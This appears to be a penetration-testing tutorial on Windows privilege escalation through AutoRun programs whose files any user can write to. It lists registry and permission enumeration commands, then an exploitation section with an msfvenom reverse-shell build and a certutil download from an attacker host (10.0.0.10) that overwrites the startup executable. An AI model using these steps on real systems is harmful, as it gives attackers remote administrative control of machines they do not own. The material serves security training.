Registry - Exploiting AutoRuns

What is AutoRuns?

Autoruns is a tool that shows all the programs and services that start automatically when Windows boots, you log in, or launch certain apps like Explorer. It covers startup folders, registry keys, browser helpers, and more.

You can hide Microsoft-signed entries to focus on third-party programs and even check auto-start items for other user accounts. It also includes a command-line tool, Autorunsc, to export results to a CSV file.

Autoruns makes it easy to find and manage everything that runs automatically on your system!

As an attacker we should make sure that the path of the program (that runs on startup) is modifiable by any user on the system to have the ability to add our payload.

Manual Enumeration

first we should query the registry for AutoRun executables.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The next steps is to verify whether the current user has write access to the .exe file so that it can be replaced with a malicious one. icacls or accesschk can be used to identify the permissions of a specific folder or file:

icacls [directory/file]

the (F) means Full Access

or with accesschk:

accesschk.exe -accepteula -wuqv [file]

Great, Everyone has Full Access!

Automated Enumeration

you could use WinPEAS or the Sysinternals Autorunsc tool.

an example from WinPEAS output:

Exploitation

All that is left now is to replace the program.exe executable with a reverse shell, to gain administrative access to the machine and force the system to execute it.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.10 LPORT=443 -f exe -o reverse.exe

Download it on victim machine:

certutil -urlcache -split -f "http://10.0.0.10/reverse.exe" program.exe

program.exe is the file name of the AutoRun executable.

Start the Listener and Restart the machine and Voila 🥳.